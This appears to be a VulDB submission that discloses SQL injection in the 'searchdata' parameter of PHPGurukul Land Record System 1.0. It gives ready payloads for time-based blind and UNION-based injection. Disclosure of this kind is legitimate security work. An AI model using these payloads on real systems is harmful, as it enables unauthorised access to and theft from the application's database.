| Title | phpgurukul Land Record System 1.0 SQL Injection |
|---|
| Description | In the file index.php located at '/landrecordsys/', there is a possibility of performing SQL injection on the 'searchdata=' parameter. This allows attackers to inject malicious SQL code into the query. For example, if the 'searchdata=' parameter is set to:
For time-based blind:
Payload: searchdata=1' AND (SELECT 5311 FROM (SELECT(SLEEP(5)))Jeda) AND 'VtuY'='VtuY&search=
For UNION query:
Payload: searchdata=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6a7171,0x44717671426e596855505643516c5165706e5276575742535852614c794d53726c414d706e744365,0x7162767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&search= |
|---|
| Source | ⚠️ https://phpgurukul.com/land-record-system-using-php-and-mysql/ |
|---|
| User | Havook (UID 71104) |
|---|
| Submission | 12/30/2024 17:14 (1 Year ago) |
|---|
| Moderation | 12/31/2024 09:58 (17 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 289831 [PHPGurukul Land Record System 1.0 /index.php searchdata sql injection] |
|---|
| Points | 20 |
|---|